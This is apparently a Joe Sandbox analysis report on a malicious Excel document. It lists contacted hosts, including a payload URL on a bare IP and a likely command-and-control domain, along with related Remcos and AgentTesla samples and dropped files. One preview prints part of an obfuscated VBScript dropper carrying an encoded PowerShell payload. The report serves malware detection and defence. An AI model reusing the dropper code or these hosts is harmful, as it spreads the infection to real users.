              http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 0000000E.00000002.606556935.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.466925518.00000000078D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.466925518.000000000797B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.606049641.000000000260D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.465326275.000000000260D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.466511830.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.607048894.00000000078D0000.00000004.00000001.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              https://uploaddeimagens.com.brpowershell.exe, 0000000C.00000002.454053406.00000000023DA000.00000004.00000800.00020000.00000000.sdmptrue
              • 7%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              http://prolinice.ga/application/x-www-form-urlencodedMozilla/5.0explorer.exe, 00000012.00000002.526156313.0000000000694000.00000004.00000020.00020000.00000000.sdmpfalse
              • 1%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              https://analytics.paste.ee;wscript.exe, 00000009.00000003.421640600.00000000003C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.422279832.000000000089C000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://www.piriform.com/ccleanerexplorer.exe, 0000000E.00000002.606556935.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.466925518.000000000797B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.606049641.000000000260D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.465326275.000000000260D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.466511830.0000000003DB1000.00000004.00000001.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              http://198.46.177.156/8080/lionarekingofjungleimageshere.bmpjEQNEDT32.EXE, 00000008.00000002.412851161.00000000002EF000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://support.mozilla.orgexplorer.exe, 0000000E.00000002.605324960.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.464250384.00000000001D6000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://prolinice.ga/index.phpMozilla/5.0explorer.exe, 00000012.00000002.526156313.0000000000664000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.509224452.000000000032E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.513249224.0000000000604000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.605434995.00000000002C4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.546090227.000000000013E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000018.00000002.605531849.0000000000684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000019.00000002.605475335.00000000002EE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.605633277.0000000000464000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001D.00000002.605402279.000000000033E000.00000004.00000020.00020000.00000000.sdmpfalse
              • 1%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              https://secure.comodo.com/CPS0wscript.exe, 00000009.00000003.418483952.00000000034B6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.423380001.0000000003489000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.458145376.00000000050DE000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=explorer.exe, 00000012.00000003.520619924.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, F8D.tmp.18.drfalse
              • URL Reputation: safe
              unknown
              https://themes.googleusercontent.comwscript.exe, 00000009.00000003.421640600.00000000003C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.422279832.000000000089C000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://crl.entrust.net/2048ca.crl0wscript.exe, 00000009.00000003.418483952.00000000034B6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.423380001.0000000003489000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.458145376.00000000050DE000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=explorer.exe, 00000012.00000003.520619924.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, F8D.tmp.18.drfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs
              IPDomainCountryFlagASNASN NameMalicious
              54.241.153.192
              z2.inkUnited States
              16509AMAZON-02UStrue
              77.232.129.190
              prolinice.gaRussian Federation
              42145BSTV-ASRUtrue
              188.114.97.3
              uploaddeimagens.com.brEuropean Union
              13335CLOUDFLARENETUStrue
              188.114.96.3
              paste.eeEuropean Union
              13335CLOUDFLARENETUStrue
              198.46.177.156
              unknownUnited States
              36352AS-COLOCROSSINGUStrue
              Joe Sandbox version:40.0.0 Tourmaline
              Analysis ID:1448086
              Start date and time:2024-05-27 18:34:05 +02:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 8m 38s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:defaultwindowsofficecookbook.jbs
              Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
              Number of analysed new started processes analysed:29
              Number of new started drivers analysed:1
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:1
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:#20240627_Edlen_A.xls
              Detection:MAL
              Classification:mal100.spre.bank.troj.spyw.expl.evad.winXLS@32/35@12/5
              EGA Information:
              • Successful, ratio: 80%
              HCA Information:
              • Successful, ratio: 97%
              • Number of executed functions: 144
              • Number of non-executed functions: 85
              Cookbook Comments:
              • Found application associated with file extension: .xls
              • Found Word or Excel or PowerPoint or XPS Viewer
              • Attach to Office via COM
              • Active ActiveX Object
              • Active ActiveX Object
              • Scroll down
              • Close Viewer
              • Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, rundll32.exe, WerFault.exe, WMIADAP.exe, conhost.exe, svchost.exe
              • Excluded IPs from analysis (whitelisted): 104.208.16.93
              • Excluded domains from analysis (whitelisted): onedsblobprdcus07.centralus.cloudapp.azure.com, watson.microsoft.com, legacywatson.trafficmanager.net
              • Execution Graph export aborted for target EQNEDT32.EXE, PID 3348 because there are no executed function
              • Execution Graph export aborted for target powershell.exe, PID 3520 because it is empty
              • Execution Graph export aborted for target rugtucw, PID 4036 because it is empty
              • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
              • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
              • Not all processes where analyzed, report is missing behavior information
              • Report size exceeded maximum capacity and may have missing behavior information.
              • Report size getting too big, too many NtOpenFile calls found.
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              TimeTypeDescription
              09:36:07Task SchedulerRun new task: Firefox Default Browser Agent B5F9789926240BBC path: C:\Users\user\AppData\Roaming\rugtucw
              12:35:22API Interceptor39x Sleep call for process: EQNEDT32.EXE modified
              12:35:24API Interceptor67x Sleep call for process: wscript.exe modified
              12:35:28API Interceptor274x Sleep call for process: powershell.exe modified
              12:36:00API Interceptor1640x Sleep call for process: explorer.exe modified
              12:36:07API Interceptor1x Sleep call for process: rugtucw modified
              12:36:07API Interceptor179x Sleep call for process: taskeng.exe modified
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              54.241.153.192HSBC Customer Information.xlsGet hashmaliciousUnknownBrowse
              • z2.ink/pWJE
              HSBC Customer Information.xlsGet hashmaliciousUnknownBrowse
              • z2.ink/pWJE
              HSBC Customer Information.xlsGet hashmaliciousUnknownBrowse
              • z2.ink/pWJE
              Ref19920830281982938RT.xlsGet hashmaliciousRemcosBrowse
              • z2.ink/nLNG
              swift.xlsGet hashmaliciousUnknownBrowse
              • z2.ink/wxMX
              swift.xlsGet hashmaliciousUnknownBrowse
              • z2.ink/wxMX
              swift.xlsGet hashmaliciousUnknownBrowse
              • z2.ink/wxMX
              LHER0006981753.xlsGet hashmaliciousRemcosBrowse
              • z2.ink/n7QN
              Ref_FTD431100.xlsGet hashmaliciousRemcosBrowse
              • z2.ink/
              188.114.97.3http://worker-frosty-surf-7141.parvgee90.workers.dev/favicon.icoGet hashmaliciousHTMLPhisherBrowse
              • worker-frosty-surf-7141.parvgee90.workers.dev/favicon.ico
              http://www.lnkfi.re/1moJNQoc/Get hashmaliciousUnknownBrowse
              • cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404referral
              http://twomancake.comGet hashmaliciousUnknownBrowse
              • twomancake.com/
              BI6oo9z4In.exeGet hashmaliciousCryptOne, Djvu, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro StealerBrowse
              • fleur-de-lis.sbs/jhgfd
              Purchase Order # PO-00159.xla.xlsxGet hashmaliciousUnknownBrowse
              • qr-in.com/YXcuqXy
              LHER000698175.xlsGet hashmaliciousUnknownBrowse
              • qr-in.com/JeYCrvM
              PO 4500025813.xlsGet hashmaliciousUnknownBrowse
              • qr-in.com/RtWEZGi
              SCB REmittance Advice.docGet hashmaliciousLokibotBrowse
              • rocheholding.top/evie3/five/fre.php
              WRnJsnI1Zq.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
              • objectiveci.top/pythonpacketGamebigloadprivateCentral.php
              http://hjkie5.pages.dev/Get hashmaliciousUnknownBrowse
              • hjkie5.pages.dev/
              188.114.96.3Curriculum Vitae Catalina Munoz.exeGet hashmaliciousFormBookBrowse
              • www.uqdr.cn/yfa0/
              http://y6ss1.shop/Get hashmaliciousUnknownBrowse
              • y6ss1.shop/l/gaz/videos/gaz-platform-preview.mp4
              http://newclaim-dannx-creat.promodaget.my.id/Get hashmaliciousUnknownBrowse
              • newclaim-dannx-creat.promodaget.my.id/
              http://worker-quiet-cherry-3fda.cbb2856.workers.dev/favicon.icoGet hashmaliciousHTMLPhisherBrowse
              • worker-quiet-cherry-3fda.cbb2856.workers.dev/favicon.ico
              SecuriteInfo.com.Win64.Evo-gen.30302.14698.exeGet hashmaliciousCryptOne, Djvu, GCleaner, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLineBrowse
              • fleur-de-lis.sbs/jhgfd
              KT-L068310.exeGet hashmaliciousFormBookBrowse
              • www.barrettdigitalart.com/i319/
              http://cfg3xe.pages.dev/Get hashmaliciousUnknownBrowse
              • cfg3xe.pages.dev/
              http://amht38eh3e3f98ox0ld1rc4h3fjcowz98ldjp5hek8.pages.dev/Get hashmaliciousUnknownBrowse
              • amht38eh3e3f98ox0ld1rc4h3fjcowz98ldjp5hek8.pages.dev/
              G5N0mtxJLN.exeGet hashmaliciousLokibotBrowse
              • rocheholding.top/evie3/five/fre.php
              Purchase Order # PO-00159.xla.xlsxGet hashmaliciousUnknownBrowse
              • qr-in.com/YXcuqXy
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              z2.inkHSBC Customer Information.xlsGet hashmaliciousUnknownBrowse
              • 54.241.153.192
              HSBC Customer Information.xlsGet hashmaliciousUnknownBrowse
              • 54.241.153.192
              HSBC Customer Information.xlsGet hashmaliciousUnknownBrowse
              • 54.241.153.192
              Ref19920830281982938RT.xlsGet hashmaliciousRemcosBrowse
              • 54.241.153.192
              swift.xlsGet hashmaliciousUnknownBrowse
              • 54.241.153.192
              swift.xlsGet hashmaliciousUnknownBrowse
              • 54.241.153.192
              swift.xlsGet hashmaliciousUnknownBrowse
              • 54.241.153.192
              LHER0006981753.xlsGet hashmaliciousRemcosBrowse
              • 54.241.153.192
              Ref_FTD431100.xlsGet hashmaliciousRemcosBrowse
              • 54.241.153.192
              paste.eekam.vbsGet hashmaliciousUnknownBrowse
              • 188.114.96.3
              las.vbsGet hashmaliciousUnknownBrowse
              • 188.114.96.3
              upload.vbsGet hashmaliciousUnknownBrowse
              • 188.114.97.3
              Ref19920830281982938RT.xlsGet hashmaliciousRemcosBrowse
              • 188.114.97.3
              LHER0006981753.xlsGet hashmaliciousRemcosBrowse
              • 188.114.97.3
              Ref_FTD431100.xlsGet hashmaliciousRemcosBrowse
              • 188.114.97.3
              upload.vbsGet hashmaliciousUnknownBrowse
              • 188.114.97.3
              update.vbsGet hashmaliciousUnknownBrowse
              • 188.114.96.3
              file.vbsGet hashmaliciousUnknownBrowse
              • 188.114.96.3
              windows.vbsGet hashmaliciousUnknownBrowse
              • 188.114.97.3
              uploaddeimagens.com.brkam.vbsGet hashmaliciousUnknownBrowse
              • 188.114.96.3
              las.vbsGet hashmaliciousUnknownBrowse
              • 188.114.97.3
              upload.vbsGet hashmaliciousUnknownBrowse
              • 188.114.97.3
              Ref19920830281982938RT.xlsGet hashmaliciousRemcosBrowse
              • 188.114.97.3
              LHER0006981753.xlsGet hashmaliciousRemcosBrowse
              • 188.114.96.3
              Ref_FTD431100.xlsGet hashmaliciousRemcosBrowse
              • 188.114.97.3
              upload.vbsGet hashmaliciousUnknownBrowse
              • 188.114.96.3
              update.vbsGet hashmaliciousUnknownBrowse
              • 188.114.96.3
              file.vbsGet hashmaliciousUnknownBrowse
              • 188.114.97.3
              windows.vbsGet hashmaliciousUnknownBrowse
              • 188.114.96.3
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              BSTV-ASRURkdXl7E3rG.exeGet hashmaliciousAsyncRATBrowse
              • 77.232.132.25
              nMbRell419.exeGet hashmaliciousAsyncRAT, GMiner, QuasarBrowse
              • 77.232.132.25
              2ctyhHi7vb.exeGet hashmaliciousAsyncRAT, GMiner, QuasarBrowse
              • 77.232.132.25
              jOR8nr6mAC.exeGet hashmaliciousQuasarBrowse
              • 77.232.132.25
              kPl1mZTpru.exeGet hashmaliciousTofseeBrowse
              • 77.232.138.239
              mtxfh5xJDf.exeGet hashmaliciousQuasarBrowse
              • 77.232.132.25
              file.exeGet hashmaliciousTofseeBrowse
              • 77.232.132.142
              BMTxyapegR.exeGet hashmaliciousAsyncRATBrowse
              • 77.232.132.25
              q05RiWoYOiGet hashmaliciousMiraiBrowse
              • 77.232.157.125
              OKkz1EHZvqGet hashmaliciousMiraiBrowse
              • 77.232.157.103
              CLOUDFLARENETUSShipping Documents inv. 523435300XX.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
              • 172.67.74.152
              https://www.acm.gov.pt/html/js/editor/ckeditor/editor/filemanager/browser/liferay/browser.html?p=insta&Connector=https://a.top1cheat.com/kJIVLY5EGet hashmaliciousUnknownBrowse
              • 172.67.184.156
              hXXps://www.acm.gov.pt/html/js/editor/ckeditor/editor/filemanager/browser/liferay/browser.html?p=insta&Connector=https://a.top1cheat.com/kJIVLY5EGet hashmaliciousUnknownBrowse
              • 172.67.184.156
              https://shorter.gg/dUUJUvGet hashmaliciousPhisherBrowse
              • 104.21.74.233
              Doc_10577030xls.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
              • 104.26.12.205
              https://stikeman-vpn.azureedge.net/?value=odWPPcOGet hashmaliciousUnknownBrowse
              • 104.17.2.184
              https://link.elliottscotthr.com/api/redirect.me?track=000000&url=https%3A%2F%2Fwww.atjehupdate.com/3tvdghGet hashmaliciousUnknownBrowse
              • 104.17.2.184
              xvJv1BpknZ.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
              • 188.114.96.3
              kam.vbsGet hashmaliciousUnknownBrowse
              • 162.159.134.233
              las.vbsGet hashmaliciousUnknownBrowse
              • 162.159.134.233
              AMAZON-02UShttps://psowapt.weebly.comGet hashmaliciousHTMLPhisherBrowse
              • 44.239.61.97
              http://isme-zcmp.campaign-view.euGet hashmaliciousUnknownBrowse
              • 108.156.60.76
              https://clt1522206.benchurl.comGet hashmaliciousUnknownBrowse
              • 54.70.163.223
              https://drive.google.com/uc?export=download&id=12v1VZUwGaH9dJNC24k24Rn9zAkDKRnBDGet hashmaliciousUnknownBrowse
              • 3.77.81.157
              angeh#U00e4ngter Ordner.docxGet hashmaliciousUnknownBrowse
              • 185.166.143.36
              angeh#U00e4ngter Ordner.docxGet hashmaliciousUnknownBrowse
              • 54.230.202.57
              USD46k Swift_PDF.exeGet hashmaliciousFormBookBrowse
              • 76.223.67.189
              nzKl7TpAyk.elfGet hashmaliciousUnknownBrowse
              • 18.219.243.207
              hZ80PhOmKK.elfGet hashmaliciousUnknownBrowse
              • 54.108.134.137
              C4zDQjrSzj.elfGet hashmaliciousUnknownBrowse
              • 34.240.188.207
              CLOUDFLARENETUSShipping Documents inv. 523435300XX.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
              • 172.67.74.152
              https://www.acm.gov.pt/html/js/editor/ckeditor/editor/filemanager/browser/liferay/browser.html?p=insta&Connector=https://a.top1cheat.com/kJIVLY5EGet hashmaliciousUnknownBrowse
              • 172.67.184.156
              hXXps://www.acm.gov.pt/html/js/editor/ckeditor/editor/filemanager/browser/liferay/browser.html?p=insta&Connector=https://a.top1cheat.com/kJIVLY5EGet hashmaliciousUnknownBrowse
              • 172.67.184.156
              https://shorter.gg/dUUJUvGet hashmaliciousPhisherBrowse
              • 104.21.74.233
              Doc_10577030xls.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
              • 104.26.12.205
              https://stikeman-vpn.azureedge.net/?value=odWPPcOGet hashmaliciousUnknownBrowse
              • 104.17.2.184
              https://link.elliottscotthr.com/api/redirect.me?track=000000&url=https%3A%2F%2Fwww.atjehupdate.com/3tvdghGet hashmaliciousUnknownBrowse
              • 104.17.2.184
              xvJv1BpknZ.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
              • 188.114.96.3
              kam.vbsGet hashmaliciousUnknownBrowse
              • 162.159.134.233
              las.vbsGet hashmaliciousUnknownBrowse
              • 162.159.134.233
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              05af1f5ca1b87cc9cc9b25185115607dRef19920830281982938RT.xlsGet hashmaliciousRemcosBrowse
              • 188.114.97.3
              37SD8SH18I.docmGet hashmaliciousUnknownBrowse
              • 188.114.97.3
              LHER0006981753.xlsGet hashmaliciousRemcosBrowse
              • 188.114.97.3
              Ref_FTD431100.xlsGet hashmaliciousRemcosBrowse
              • 188.114.97.3
              Offer 15492024 15602024.docx.docGet hashmaliciousUnknownBrowse
              • 188.114.97.3
              Home Purchase Contract and Property Details.xlsGet hashmaliciousRemcos, DBatLoaderBrowse
              • 188.114.97.3
              1080.xlsGet hashmaliciousUnknownBrowse
              • 188.114.97.3
              Sipari#U015f detaylar#U0131.xlsGet hashmaliciousUnknownBrowse
              • 188.114.97.3
              Drwg.xlsGet hashmaliciousUnknownBrowse
              • 188.114.97.3
              Pepsico RFQ_P1005712.xlsGet hashmaliciousGuLoaderBrowse
              • 188.114.97.3
              7dcce5b76c8b17472d024758970a406bRef19920830281982938RT.xlsGet hashmaliciousRemcosBrowse
              • 188.114.96.3
              LHER0006981753.xlsGet hashmaliciousRemcosBrowse
              • 188.114.96.3
              Ref_FTD431100.xlsGet hashmaliciousRemcosBrowse
              • 188.114.96.3
              documentos.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
              • 188.114.96.3
              Items.xlsGet hashmaliciousUnknownBrowse
              • 188.114.96.3
              Items.xlsGet hashmaliciousUnknownBrowse
              • 188.114.96.3
              ArOuryf0GL.rtfGet hashmaliciousAgentTeslaBrowse
              • 188.114.96.3
              Offer 15492024 15602024.docx.docGet hashmaliciousUnknownBrowse
              • 188.114.96.3
              SCB REmittance Advice.docGet hashmaliciousLokibotBrowse
              • 188.114.96.3
              948209184.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
              • 188.114.96.3
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              C:\Users\user\AppData\Roaming\rugtucwRequirements.xla.xlsxGet hashmaliciousAveMaria, UACMeBrowse
                vns.exeGet hashmaliciousAsyncRAT, VenomRATBrowse
                  Doc606112.xlsGet hashmaliciousAgentTeslaBrowse
                    SWIFT26794306.xlam.xlsxGet hashmaliciousAgentTesla, zgRATBrowse
                      Enquiry#234342.xlam.xlsxGet hashmaliciousAgentTesla, zgRATBrowse
                        Profoma.xlsGet hashmaliciousAgentTeslaBrowse
                          Scan_doc000680092112202023130.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                            SecuriteInfo.com.Win32.RansomX-gen.23647.22068.exeGet hashmaliciousAgentTeslaBrowse
                              e-Profile.jsGet hashmaliciousAgentTeslaBrowse
                                Orden_581278118.xlam.xlsxGet hashmaliciousNanocoreBrowse
                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):131072
                                  Entropy (8bit):0.025246492481374738
                                  Encrypted:false
                                  SSDEEP:6:I3DPcfy/7u1HvxggLR5kS1AZoFRXv//4tfnRujlw//+GtluJ/eRuj:I3DPjuRf/vYg3J/
                                  MD5:C15C83C5778720A2D10B25F1C6201622
                                  SHA1:01DEED5673CFF4E446E8D88EEB46AFE8620688C2
                                  SHA-256:4C66CD17E00341199BCF6E5164D37069C18ED3FAE49EB46AB1C12B61B9C3D526
                                  SHA-512:35CE37315234C755CDD9891D463C95DDCF825E351BAFEF0F0F7B67C918A54C14B474D303BFA58C50DF6ED69608448D0E517AD4980752577E20A264DF9EC20333
                                  Malicious:false
                                  Preview:......M.eFy...z.^.9..EE....._,S,...X.F...Fa.q............................G.]z).YK.6O...............8.i+]C....#9.y.....................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):4760
                                  Entropy (8bit):4.834060479684549
                                  Encrypted:false
                                  SSDEEP:96:RCJ2Woe5u2k6Lm5emmXIGxgyg12jDs+un/iQLEYFjDaeWJ6KGcmXSFRLcU6/KD:cxoe5uVsm5emdOgkjDt4iWN3yBGHydcY
                                  MD5:838C1F472806CF4BA2A9EC49C27C2847
                                  SHA1:D1C63579585C4740956B099697C74AD3E7C89751
                                  SHA-256:40A844E6AF823D9E71A35DFEE1FF7383D8A682E9981FB70440CA47AA1F6F1FF3
                                  SHA-512:E784B61696AB19C5A178204A11E4012A9A29D58B3D3BF1D5648021693883FFF343C87777E7A2ADC81B833148B90B88E60948B370D2BB99DEC70C097B5C91B145
                                  Malicious:false
                                  Preview:PSMODULECACHE............Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script...............T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):64
                                  Entropy (8bit):0.34726597513537405
                                  Encrypted:false
                                  SSDEEP:3:Nlll:Nll
                                  MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                  SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                  SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                  SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                  Malicious:false
                                  Preview:@...e...........................................................
                                  Process:C:\Windows\SysWOW64\wscript.exe
                                  File Type:ASCII text, with very long lines (11472), with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):13831
                                  Entropy (8bit):4.589493012801081
                                  Encrypted:false
                                  SSDEEP:384:xFcXR9Vw42L2rVXwsL0d+m8uGDye3j/pSH+K+Ro/VpPgR9VNVb7mKVW:0VhEYVXz0gXuGue3j/pZJuViDPmKVW
                                  MD5:A24C979AFEC9E3D77453DBAFA2752713
                                  SHA1:C16882A43FD1E994E1790C7CC1B98AE9A6841FDB
                                  SHA-256:72B94D64C4A77D67B8DEF0F39A44CA39F49C3266EE2498F0C5668B2FC195EBE3
                                  SHA-512:21E12605ACCDFAE174FB50D86A2D716E8AD09EEA893F83AD2113E9B1461E15199D30B8CFBE921AEEC01A85436C6918235CADF730D9F96F95E464E31301F44C8F
                                  Malicious:false
                                  Preview:.. dim periodicamente , regulador , desvirginizar , passarinha , mustelino , Cama , mustelino1.. regulador = " ".. desvirginizar = "" & passarinha & regulador & passarinha & "gB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTre" & passarinha & regulador & passarinha & "QBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTre" & passarinha & regulador & passarinha & "QB3DgTreC0DgTreTwBiDgTreGoDgTre" & passarinha & regulador & passarinha & "QBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTre" & passarinha & regulador & passarinha & "QB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTre" & passarinha & regulador & passarinha & "QBuDgTreH
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:ISO-8859 text, with very long lines (1707), with CRLF, CR, LF line terminators
                                  Category:dropped
                                  Size (bytes):28906
                                  Entropy (8bit):3.097021912670486
                                  Encrypted:false
                                  SSDEEP:768:RqCYhRWIXXXd4r+ZCniBMjHtL6KPIfDarDY8:RGRWkd4YCiKjxjPIbar88
                                  MD5:F086617AD5F31052493192AF152C2FDF
                                  SHA1:2E1B7041E9F9A3BCC8300BCD15956C4CBE1B3A72
                                  SHA-256:E69569FFB1BDBF9185CB732BFA897EFDA4E62BA095D519EF3316BBDEBD6D9B9E
                                  SHA-512:F30E011A09DCBD744C67FC56676A5660A016DAFE1A1525FE91A12E11B360F741FB6EDE434EDDEC0487DAAA9A099ED9AC52095895C552C3E12AD74B535FBB9DEB
                                  Malicious:true
                                  Yara Hits:
                                  • Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\lionsarebeautifultoruletheforestandtheyalwayskingogthejunglewhoneverknowmanythingkingisrigerbutlionisthekingo__junglelionbeautiufl[1].doc, Author: ditekSHen
                                  Antivirus:
                                  • Antivirus: Avira, Detection: 100%
